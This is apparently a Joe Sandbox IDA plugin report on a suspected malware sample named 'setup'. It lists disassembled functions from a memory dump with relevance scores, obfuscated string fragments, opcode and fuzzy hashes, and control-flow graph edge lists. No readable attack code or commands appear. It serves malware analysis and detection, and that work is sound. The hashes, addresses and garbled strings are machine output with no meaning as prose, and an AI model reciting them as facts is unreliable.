                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $"$#$$$&$'$($*$,$.$0$2$4$6$8$8$:$<$>$?$A$B$H$J$L$M$P$P$Q$R$S$X$Z$\$^$_$`$r$w$y
                                                                                                                                                                                                                                  • API String ID: 0-810699627
                                                                                                                                                                                                                                  • Opcode ID: 65bdd9a008074facf1bd4fdb788f66b981c574430443fbea6f4c089478d32145
                                                                                                                                                                                                                                  • Instruction ID: 885a581642a4e9196a7745ecba385f67a2e370340fbe3f58930cbfaa5efd527f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65bdd9a008074facf1bd4fdb788f66b981c574430443fbea6f4c089478d32145
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40A16C2160C7C18EE336863C885979FBEC11BE7228F094A9DD5ED4B3D3CAB945098767
                                                                                                                                                                                                                                  Function 007D5B5D Relevance: 30.4, Strings: 24, Instructions: 444COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 891 7d5b5d-7d5d18 892 7d5d1d-7d5d58 891->892 892->892 893 7d5d5a-7d5ffc 892->893 894 7d5ffd-7d602a 893->894 894->894 895 7d602c-7d6210 894->895 896 7d621d-7d6277 895->896 896->896 897 7d6279-7d645b 896->897 898 7d645d-7d64c9 897->898 898->898 899 7d64cb-7d66bc 898->899 900 7d66bd-7d6728 899->900 900->900 901 7d672a-7d6738 900->901
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 6$AA$BQ$C1p3$H9K;$HI$IL$J9$L5N7$L=J?$L=O?$N]$P!V#$U%U'$Y)[+$\O$]U$_-l/$no$u5F7$y9J;$~CzM$,"$]_
                                                                                                                                                                                                                                  • API String ID: 0-123358818
                                                                                                                                                                                                                                  • Opcode ID: 601b82f3b377eb178924fc19cebe0935ebb80a18eddd83e46e00c14e17d6623f
                                                                                                                                                                                                                                  • Instruction ID: efdc17103b69d2c7cd82840888e713a324ae237f9c55908527b9f5075c7e2867
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 601b82f3b377eb178924fc19cebe0935ebb80a18eddd83e46e00c14e17d6623f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29420DB160C7858AD334CF25D842B8FBAF2FB92304F108D2DC1D96B256D775864A8B97
                                                                                                                                                                                                                                  Function 007E94CF Relevance: 26.5, Strings: 21, Instructions: 285COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 913 7e94cf-7e9615 914 7e9617-7e961a 913->914 915 7e961c-7e964f 914->915 916 7e9651-7e968e 914->916 915->914 917 7e9690-7e9693 916->917 918 7e96ac-7e9718 917->918 919 7e9695-7e96aa 917->919 920 7e971a-7e971d 918->920 919->917 921 7e971f-7e9752 920->921 922 7e9754-7e9782 920->922 921->920 923 7e9784-7e9787 922->923 924 7e9789-7e979e 923->924 925 7e97a0-7e97f5 923->925 924->923 926 7e97f7-7e97fa 925->926 927 7e97fc-7e9818 926->927 928 7e981a-7e9838 926->928 927->926 929 7e983a-7e983d 928->929 930 7e983f-7e9854 929->930 931 7e9856-7e9859 929->931 930->929 932 7e985b-7e9861 931->932 933 7e9868-7e987a 932->933 934 7e9863 932->934 936 7e987e-7e9884 933->936 937 7e987c 933->937 935 7e98ed-7e990e 934->935 938 7e98de-7e98e1 936->938 939 7e9886-7e98db call 7ef58d 936->939 937->938 941 7e98e5-7e98e8 938->941 942 7e98e3 938->942 939->938 941->932 942->935
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: !$"$($,$.$1$2$4$<$>$>$>$N$T$\$i$m$o$x${${
                                                                                                                                                                                                                                  • API String ID: 0-517395136
                                                                                                                                                                                                                                  • Opcode ID: 46bb1e59e615ea8ce5a0fd337a0a7328b367431f255ab176fcc811a5e727279b
                                                                                                                                                                                                                                  • Instruction ID: 632a1d75d9ba737673d470d004fb8310cfd99f2c94be0c81f605744d5f53361e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46bb1e59e615ea8ce5a0fd337a0a7328b367431f255ab176fcc811a5e727279b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62D180219087D98EDB22CA7C88483CDBFA15B27324F1843D9C5E96B3D3C775498ADB52
                                                                                                                                                                                                                                  Function 007C26D0 Relevance: 15.8, Strings: 12, Instructions: 834COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 944 7c26d0-7c26e8 945 7c26ea-7c26ed 944->945 946 7c26ef-7c2714 945->946 947 7c2716-7c2744 call 7b308d 945->947 946->945 950 7c2746-7c2749 947->950 951 7c27aa-7c27d2 call 7b308d 950->951 952 7c274b-7c27a8 950->952 955 7c27d4-7c280f call 7c5dfd 951->955 956 7c27d6-7c27da 951->956 952->950 964 7c2811 955->964 965 7c2813-7c2854 call 7b986d call 7bbe4d 955->965 958 7c3304 956->958 960 7c3d5e 958->960 961 7c3d60-7c3d76 call 7b374d 960->961 970 7c0998-7c3d87 961->970 971 7c09a1-7c09cb call 7b375d 961->971 964->965 977 7c2856-7c2859 965->977 981 7c09cf-7c09d2 971->981 979 7c285b-7c2870 977->979 980 7c2872-7c289b call 7b308d 977->980 979->977 987 7c289d 980->987 988 7c289f-7c28c2 call 7c5dfd 980->988 982 7c0a1a-7c0a3f call 7b364d 981->982 983 7c09d4-7c0a18 981->983 992 7c0a41-7c0a64 982->992 993 7c0a43 982->993 983->981 990 7c28f1-7c2919 call 7c5dfd 987->990 997 7c28c4 988->997 998 7c28c6-7c28ef call 7b986d call 7bbe4d 988->998 1004 7c291d-7c29b9 call 7b986d call 7bbe4d 990->1004 1005 7c291b 990->1005 999 7c0a66-7c0a69 992->999 993->961 997->998 998->990 1002 7c0a6f-7c0afe 999->1002 1003 7c0b03-7c0b5a call 7b318d 999->1003 1002->999 1003->960 1016 7c0b60 1003->1016 1018 7c29bb-7c29be 1004->1018 1005->1004 1016->960 1019 7c29c4-7c2aad 1018->1019 1020 7c2ab2-7c2ac4 1018->1020 1019->1018 1021 7c2ac6-7c2adb call 7b987d 1020->1021 1022 7c2ae0-7c2afd 1020->1022 1021->958 1024 7c2aff 1022->1024 1025 7c2b01-7c2b57 call 7b986d 1022->1025 1024->1025 1031 7c2b59-7c2b7d call 7b987d * 2 1025->1031 1032 7c2b82-7c2bab call 7b987d 1025->1032 1050 7c3302 1031->1050 1039 7c2bad-7c2bb0 1032->1039 1041 7c2c16-7c2c3a call 7b308d 1039->1041 1042 7c2bb2-7c2c14 1039->1042 1048 7c2cc4-7c2ce2 1041->1048 1049 7c2c40-7c2c97 call 7c5dfd 1041->1049 1042->1039 1052 7c2ce6-7c2ce9 1048->1052 1057 7c2c99 1049->1057 1058 7c2c9b-7c2cbf call 7b986d call 7bbe4d 1049->1058 1050->958 1054 7c2d0f-7c2d55 call 7b339d 1052->1054 1055 7c2ceb-7c2d0d 1052->1055 1061 7c2d57-7c2d5a 1054->1061 1055->1052 1057->1058 1058->1048 1063 7c2df4-7c2e1b call 7b329d 1061->1063 1064 7c2d60-7c2def 1061->1064 1068 7c31cd-7c3265 call 7ba47d call 7c6ebd call 7bae4d 1063->1068 1069 7c2e21-7c2e51 call 7b374d 1063->1069 1064->1061 1086 7c32a8-7c32d8 call 7b987d * 2 1068->1086 1087 7c3267-7c327b 1068->1087 1075 7c2e55-7c2e7a call 7b986d 1069->1075 1076 7c2e53 1069->1076 1082 7c2e7c-7c2e85 1075->1082 1083 7c2ea9-7c2eab 1075->1083 1076->1075 1088 7c2e87-7c2e93 call 7c5f3d 1082->1088 1085 7c2ead-7c2eaf 1083->1085 1090 7c2eb6-7c2efd call 7b375d 1085->1090 1091 7c2eb1 1085->1091 1122 7c32da-7c32dd call 7b987d 1086->1122 1123 7c32e2-7c32ec 1086->1123 1092 7c327d-7c327f 1087->1092 1093 7c3298-7c32a4 call 7b987d 1087->1093 1104 7c2e95-7c2ea7 1088->1104 1106 7c2eff-7c2f02 1090->1106 1091->1068 1103 7c3281-7c3292 call 7c60dd 1092->1103 1093->1086 1114 7c3294 1103->1114 1115 7c3296 1103->1115 1104->1083 1109 7c2f49-7c2f90 call 7b308d 1106->1109 1110 7c2f04-7c2f47 1106->1110 1118 7c2f92-7c2f95 1109->1118 1110->1106 1114->1103 1115->1093 1120 7c2fce-7c3023 call 7b308d 1118->1120 1121 7c2f97-7c2fcc 1118->1121 1131 7c302a-7c302d 1120->1131 1121->1118 1122->1123 1126 7c32ee-7c32f1 call 7b987d 1123->1126 1127 7c32f6-7c32fd call 7ba55d 1123->1127 1126->1127 1127->1050 1132 7c302f-7c307e 1131->1132 1133 7c3080-7c30d0 call 7b339d 1131->1133 1132->1131 1136 7c30d2-7c30d5 1133->1136 1137 7c3146-7c31c8 call 7b339d call 7c5f5d 1136->1137 1138 7c30d7-7c3144 1136->1138 1137->1085 1138->1136
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: %$'$=$?$L$L$VN $`$i$q$s$y
                                                                                                                                                                                                                                  • API String ID: 0-3939372272
                                                                                                                                                                                                                                  • Opcode ID: 912b535f60824265e9b666ca36e6950ec4b6729cdaf48b2711bd08b7feea76c1
                                                                                                                                                                                                                                  • Instruction ID: b4c5d83776ecbfde2c0dd0750cc8e1d08c90ffaa773300b68478ee20708ca47a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 912b535f60824265e9b666ca36e6950ec4b6729cdaf48b2711bd08b7feea76c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F162D572A0C7908BD724DF3884957AEBBD1AFD5320F198A2DD4E9D73C2D63889458B43
                                                                                                                                                                                                                                  Function 007C0B69 Relevance: 14.6, Strings: 11, Instructions: 843COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1151 7c0b69-7c0b81 1152 7c0b83-7c0b86 1151->1152 1153 7c0b88-7c0bf7 1152->1153 1154 7c0bf9-7c0c18 call 7b364d 1152->1154 1153->1152 1157 7c0c1e-7c0c4c 1154->1157 1158 7c0f3a 1154->1158 1160 7c0c4e-7c0c51 1157->1160 1159 7c3d5e 1158->1159 1161 7c3d60-7c3d76 call 7b374d 1159->1161 1162 7c0c9d-7c0cbc 1160->1162 1163 7c0c53-7c0c9b 1160->1163 1171 7c0998-7c3d87 1161->1171 1172 7c09a1-7c09cb call 7b375d 1161->1172 1165 7c0cbe-7c0cc1 1162->1165 1163->1160 1167 7c0d14-7c0d3c call 7b364d 1165->1167 1168 7c0cc3-7c0d12 1165->1168 1175 7c0d3e 1167->1175 1176 7c0d43-7c0d5b 1167->1176 1168->1165 1183 7c09cf-7c09d2 1172->1183 1175->1158 1179 7c0d5d-7c0d60 1176->1179 1181 7c0d9d-7c0dbc call 7b364d 1179->1181 1182 7c0d62-7c0d9b 1179->1182 1181->1158 1190 7c0dc2-7c0dda 1181->1190 1182->1179 1184 7c0a1a-7c0a3f call 7b364d 1183->1184 1185 7c09d4-7c0a18 1183->1185 1191 7c0a41-7c0a64 1184->1191 1192 7c0a43 1184->1192 1185->1183 1193 7c0ddc-7c0ddf 1190->1193 1197 7c0a66-7c0a69 1191->1197 1192->1161 1195 7c0e39-7c0e58 call 7b364d 1193->1195 1196 7c0de1-7c0e37 1193->1196 1195->1158 1203 7c0e5e-7c0e84 1195->1203 1196->1193 1199 7c0a6f-7c0afe 1197->1199 1200 7c0b03-7c0b5a call 7b318d 1197->1200 1199->1197 1200->1159 1210 7c0b60 1200->1210 1204 7c0e86-7c0e89 1203->1204 1206 7c0e8b-7c0f04 1204->1206 1207 7c0f06-7c0f32 call 7b364d 1204->1207 1206->1204 1207->1159 1212 7c0f38-7c0f57 1207->1212 1210->1159 1214 7c0f59-7c0f5c 1212->1214 1215 7c100a-7c103d call 7b308d 1214->1215 1216 7c0f62-7c1005 1214->1216 1219 7c103f-7c1042 1215->1219 1216->1214 1220 7c1048-7c10c5 1219->1220 1221 7c10ca-7c10fd call 7b329d 1219->1221 1220->1219 1224 7c10ff-7c1102 1221->1224 1225 7c1149-7c117c call 7b308d 1224->1225 1226 7c1104-7c1147 1224->1226 1229 7c117e-7c1181 1225->1229 1226->1224 1230 7c11c2-7c123b call 7b318d 1229->1230 1231 7c1183-7c11c0 1229->1231 1234 7c123d-7c1240 1230->1234 1231->1229 1235 7c1284-7c1300 call 7b318d 1234->1235 1236 7c1242-7c1282 1234->1236 1239 7c1302-7c1305 1235->1239 1236->1234 1240 7c135a-7c13a3 call 7b339d call 7c5dfd 1239->1240 1241 7c1307-7c1358 1239->1241 1246 7c13a5 1240->1246 1247 7c13a7-7c1443 call 7b986d call 7bbe4d 1240->1247 1241->1239 1246->1247 1253 7c1445-7c1448 1247->1253 1254 7c144e-7c14e1 1253->1254 1255 7c14e6-7c14f3 1253->1255 1254->1253 1256 7c14f5-7c150c call 7b987d 1255->1256 1257 7c1511-7c152e 1255->1257 1266 7c1787 1256->1266 1259 7c1530 1257->1259 1260 7c1532-7c1582 call 7b986d 1257->1260 1259->1260 1268 7c159c-7c15e0 call 7b987d call 7c5dfd 1260->1268 1269 7c1584-7c1597 call 7b987d 1260->1269 1266->1159 1281 7c15e4-7c163a call 7b986d call 7bbe4d call 7ba47d 1268->1281 1282 7c15e2 1268->1282 1278 7c1785 1269->1278 1278->1266 1289 7c163c-7c1648 call 7b374d 1281->1289 1282->1281 1292 7c164f-7c1668 call 7b372d call 7b316d 1289->1292 1293 7c164a-7c1780 call 7b987d * 2 call 7bae4d call 7ba55d 1289->1293 1302 7c167a-7c16b6 call 7c5dfd 1292->1302 1303 7c166a-7c1675 1292->1303 1293->1278 1310 7c16b8 1302->1310 1311 7c16ba-7c173f call 7b986d call 7bbe4d call 7d284d call 7b987d 1302->1311 1306 7c1741-7c1744 1303->1306 1306->1289 1310->1311 1311->1306
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $;$Q$X$Y$d$i$n$o$w$|
                                                                                                                                                                                                                                  • API String ID: 0-3832149783
                                                                                                                                                                                                                                  • Opcode ID: 2314355056bd722770183cb8088b132bd75681a9d676ab7912b51b54628eeb43
                                                                                                                                                                                                                                  • Instruction ID: cf7f0ab8209bb562b860aedb86457ee1ddab37ff034aae2d95bf3335814a805d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2314355056bd722770183cb8088b132bd75681a9d676ab7912b51b54628eeb43
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D462E632A0C7908BD324DB78C8957AFBBD2ABD5314F198A7ED4D9C7382D67889418743
                                                                                                                                                                                                                                  Function 007CFA6D Relevance: 13.3, Strings: 10, Instructions: 829COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $$&$6-v<$CJGW$FGOH$SGWS$XDAA$dca$$gncs$%H
                                                                                                                                                                                                                                  • API String ID: 0-2567165219
                                                                                                                                                                                                                                  • Opcode ID: eb546a2a158926e177071005041b231b40cb808c75dd288af3dc57dd028db345
                                                                                                                                                                                                                                  • Instruction ID: 240a6cca6164edf065820b77e5847a544d3a8195cd9d397a33475dab897607c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb546a2a158926e177071005041b231b40cb808c75dd288af3dc57dd028db345
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9652377150C3949FC725CF24C850B6EBBE2AF96304F18866DE8E55B392D739C909CB92
                                                                                                                                                                                                                                  Function 007C3309 Relevance: 10.5, Strings: 8, Instructions: 548COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: '$-$:$E$K$U$k$w
                                                                                                                                                                                                                                  • API String ID: 0-3832130547
                                                                                                                                                                                                                                  • Opcode ID: 19d7d434640ac6aa149b3d60ae7f1188e680d85b1327cfd79b2319fd7a979a87
                                                                                                                                                                                                                                  • Instruction ID: c061eea8fab7ff88303c6e6a7b978c2d15697c8e1449d5d28a90203fa2255096
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19d7d434640ac6aa149b3d60ae7f1188e680d85b1327cfd79b2319fd7a979a87
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC22E87260C780CBD728DF38C4957AEBBE1ABD5310F198A2DE5D9D7382D67889058B43
                                                                                                                                                                                                                                  Function 007D43F9 Relevance: 9.1, Strings: 7, Instructions: 320COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: *U/$1$7@B6$N:;K$P'Y$b^\4$cdbc
                                                                                                                                                                                                                                  • API String ID: 0-3653579167
                                                                                                                                                                                                                                  • Opcode ID: 445a948b9a26183fc3260df5ce2c48d07d97ecb2d2a5b58b0b3d90713b69fb5e
                                                                                                                                                                                                                                  • Instruction ID: d936a5124946f032d5451e591a60388e8568bfde9d90cbaaa19635ce6d1d455f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 445a948b9a26183fc3260df5ce2c48d07d97ecb2d2a5b58b0b3d90713b69fb5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BA1DDB150C3918FD711CF29D49066BBFE1ABE3304F19895CE0E14B352D779880ACB96
                                                                                                                                                                                                                                  Function 007EA5ED Relevance: 8.1, Strings: 6, Instructions: 614COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: :$Xrsp$YV$\$d7g1$e3`=
                                                                                                                                                                                                                                  • API String ID: 0-1510934275
                                                                                                                                                                                                                                  • Opcode ID: e39bb1f7dbe3c2ddcf04374d7c298b6df9e0e7d3c69ca82d5ba1492e881b68bb
                                                                                                                                                                                                                                  • Instruction ID: c026fee9b246b3cdf3942c0790bee6949c528226ef008b31dc7c91b96e46c4cf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e39bb1f7dbe3c2ddcf04374d7c298b6df9e0e7d3c69ca82d5ba1492e881b68bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4912E276609380AFD710CF26C88475BBBE2EFC9710F14892CF9959B290D778E905CB52
                                                                                                                                                                                                                                  Function 007CB2BF Relevance: 7.6, Strings: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ];_$"Q!S$-U)W$2A=C$3E5G$=Y([
                                                                                                                                                                                                                                  • API String ID: 0-1233860087
                                                                                                                                                                                                                                  • Opcode ID: 0779789e10b95b7f69b45071bbcfe072519a8d08cfbfb59a7e27c0a9082712ce
                                                                                                                                                                                                                                  • Instruction ID: efb7534e40ad3b35f36d1f74ed781dc5bbc932fe8ab669a9e7ead46f529f6e61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0779789e10b95b7f69b45071bbcfe072519a8d08cfbfb59a7e27c0a9082712ce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F331CDB66193508BC7318F19C886B9BB7F0FF96720F188A5CE4D89B251E3789801CB52
                                                                                                                                                                                                                                  Function 007D5352 Relevance: 7.6, Strings: 6, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ?Q<S$@A$J%O'$K)K+$S=S?$^1V3
                                                                                                                                                                                                                                  • API String ID: 0-291098561
                                                                                                                                                                                                                                  • Opcode ID: a1748a7a25d357aa654c81b537de1f201b28465e1915cb39141e5518106d14a0
                                                                                                                                                                                                                                  • Instruction ID: 68c5f7e1e34fe62e6f2597c990bc6d4105b96eba26a0e098fa56b455b3fda7cf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1748a7a25d357aa654c81b537de1f201b28465e1915cb39141e5518106d14a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B31DFB15187409FD744CF26D89006FFBF2ABD6354F549E2DE4AA8B310DB78850A8F42
                                                                                                                                                                                                                                  Function 007BAA6D Relevance: 6.6, Strings: 5, Instructions: 375COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 8,-7$:#?8$=$<7$J$x[
                                                                                                                                                                                                                                  • API String ID: 0-1617895910
                                                                                                                                                                                                                                  • Opcode ID: ac4e9b2b7fad3f1ad03b0ffa077755583c6e03c681aea3ec91f3d70ba34a848a
                                                                                                                                                                                                                                  • Instruction ID: d4ad86864362fd98d4534053052f699404be8b1c86c224cb716e012ea7ab7955
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac4e9b2b7fad3f1ad03b0ffa077755583c6e03c681aea3ec91f3d70ba34a848a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72B1D27064C3919BC3269F2984907ABFFE19FA3301F0889ACE4D55F742D239894AD767
                                                                                                                                                                                                                                  Function 007DC61D Relevance: 6.6, Strings: 5, Instructions: 300COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: -!A$-0$0$tvoc${e~`
                                                                                                                                                                                                                                  • API String ID: 0-1860951997
                                                                                                                                                                                                                                  • Opcode ID: 0aca53b16568f12b59cc4bbe31310a03a6ee3ee23cb49bdf4f960ad0e7cfb403
                                                                                                                                                                                                                                  • Instruction ID: 2f90ee96c2b6d4d80d44362a9da6816daff9ff8cdb13a37a17309c8269deec50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0aca53b16568f12b59cc4bbe31310a03a6ee3ee23cb49bdf4f960ad0e7cfb403
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB91AD7150D3C18BD739CF29C4617ABBBE1ABD2310F28895ED8D98B392DB358506CB52
                                                                                                                                                                                                                                  Function 007BC74A Relevance: 6.3, Strings: 5, Instructions: 92COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: f?d$"j!h$8r<p$:n=l$n&G$
                                                                                                                                                                                                                                  • API String ID: 0-4152412813
                                                                                                                                                                                                                                  • Opcode ID: 0c7a8034791b5c6018e52c2f1540ccf0c3cfc4bf90b0052ea029e0dcf63348b8
                                                                                                                                                                                                                                  • Instruction ID: e3065f902029688117d4b49f5875a42260c0877548740f8d2d6175eed57bc03c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c7a8034791b5c6018e52c2f1540ccf0c3cfc4bf90b0052ea029e0dcf63348b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9951FDB4502343CFE359CF968581785FBB2FB02200F19A7A9C5695FA26D7B084D2CF95
                                                                                                                                                                                                                                  Function 007BC0CD Relevance: 5.4, Strings: 4, Instructions: 443COMMON
